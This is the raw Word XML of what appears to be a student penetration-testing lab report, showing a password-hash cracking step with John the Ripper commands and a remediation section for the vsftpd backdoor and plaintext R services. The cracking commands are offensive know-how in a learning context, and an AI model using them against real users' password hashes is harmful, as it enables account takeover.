    <w:p w14:paraId="48648E2D" w14:textId="5E0D6A4F" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B43D1A" wp14:editId="60F43509">
            <wp:extent cx="3667637" cy="1419423"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="164572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283" name="Picture 164572283"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3667637" cy="1419423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7C45B" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC"/>
    <w:p w14:paraId="4734D59F" w14:textId="054CBE47" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2C680E" wp14:editId="243C0FE5">
            <wp:extent cx="5731510" cy="1861820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="57161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1036" name="Picture 57161036"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1861820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349B30E" w14:textId="311EECFA" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC"/>
    <w:p w14:paraId="2F985D2E" w14:textId="77777777" w:rsidR="00F22EBA" w:rsidRPr="00FA0C07" w:rsidRDefault="00F22EBA" w:rsidP="004873CC"/>
    <w:p w14:paraId="2EEBE79A" w14:textId="43D68B7B" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51A06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6 </w:t>
      </w:r>
      <w:r w:rsidR="00DA2383">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51A06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cracking password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07971A94" w14:textId="2DDF4D59" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259EFFCD" w14:textId="01A1A9E3" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$ nano srishti_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2B493" w14:textId="140774CC" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$ john srishti_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D216AF5" w14:textId="7468F211" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">$ john srishti_hash.txt </w:t>
      </w:r>
      <w:r w:rsidR="00DA2383">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721315AC" w14:textId="3678FD8E" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA404E1" wp14:editId="72146B61">
            <wp:extent cx="5731510" cy="1553845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="172435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58139" name="Picture 1724358139"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">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p>
    <w:p w14:paraId="2D57F238" w14:textId="49CF011B" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0C07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 7 – Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CCA061" w14:textId="30D37FBC" w:rsidR="008D4872" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C656E0" w14:textId="1C191D9F" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability- Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25319009" w14:textId="4E221D3B" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation- upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsfpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.0.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585E9F59" w14:textId="6C68C1E3" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">                          Disable FTP and use SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBA7F5" w14:textId="77777777" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB1D2A2" w14:textId="6C2CFAA6" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R services (Ports 512-514):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6149DB" w14:textId="47822784" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability- Plaintext credentials (CVE-1999-0651)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312777B" w14:textId="55DE9E9D" w:rsidR="00DA2383" w:rsidRPr="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00DA2383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation- Disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, rlogin, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DF8A2" w14:textId="77777777" w:rsidR="00ED26FD" w:rsidRDefault="00ED26FD" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7236BDB8" w14:textId="005B0955" w:rsidR="00211AB3" w:rsidRDefault="00ED26FD" w:rsidP="00211AB3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED26FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Major Learning From this project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711561E" w14:textId="7F07A537" w:rsidR="004873CC" w:rsidRPr="008D4872" w:rsidRDefault="008D4872" w:rsidP="008D4872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Methods of password cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DB4C2" w14:textId="21942D8A" w:rsidR="008D4872" w:rsidRPr="008D4872" w:rsidRDefault="008D4872" w:rsidP="008D4872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Importance of remediation to secure system against attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DBD41B" w14:textId="475245F7" w:rsidR="008D4872" w:rsidRPr="008D4872" w:rsidRDefault="008D4872" w:rsidP="008D4872">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for network scanning and enumeration.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008D4872" w:rsidRPr="008D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216B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE282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352FBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E9A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17DBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C582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270192"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC36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4827988">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1224608243">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2078621867">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1918897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CC"/>
    <w:rsid w:val="000A7779"/>
    <w:rsid w:val="000F7F3C"/>
    <w:rsid w:val="00147793"/>
    <w:rsid w:val="001E7D6E"/>
    <w:rsid w:val="00210A1B"/>
    <w:rsid w:val="00211AB3"/>
    <w:rsid w:val="00225611"/>
    <w:rsid w:val="002B130F"/>
    <w:rsid w:val="002B5850"/>
    <w:rsid w:val="00425607"/>
    <w:rsid w:val="004873CC"/>
    <w:rsid w:val="004B2E57"/>
    <w:rsid w:val="00513DDB"/>
    <w:rsid w:val="00525CC1"/>
    <w:rsid w:val="005A7EA6"/>
    <w:rsid w:val="00656DB4"/>
    <w:rsid w:val="00745E95"/>
    <w:rsid w:val="0077539D"/>
    <w:rsid w:val="00886223"/>
    <w:rsid w:val="008D4872"/>
    <w:rsid w:val="009132E1"/>
    <w:rsid w:val="00970DEB"/>
    <w:rsid w:val="00C51A06"/>
    <w:rsid w:val="00CF60DA"/>
    <w:rsid w:val="00DA2383"/>
    <w:rsid w:val="00EB684F"/>
    <w:rsid w:val="00ED26FD"/>
    <w:rsid w:val="00F00B08"/>
    <w:rsid w:val="00F22EBA"/>
    <w:rsid w:val="00FA0C07"/>
    <w:rsid w:val="00FB1F62"/>
    <w:rsid w:val="00FD4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B551"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB48CF13-EAE2-4D9E-BDDB-CE16E371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62"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004873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3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3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3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3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3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3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3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3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3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3CC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00487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3CC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="004873CC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004873CC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="004873CC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="004873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3CC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="004873CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002B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8611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="727731557">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="705956026">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1359550590">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="604077358">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="66802754">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="148448138">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="200825999">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1529297040">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="154534043">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="910844047">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2119787009">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1457018996">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1995453697">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1318530148">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2068917008">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="218173264">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="43603860">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1732727280">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
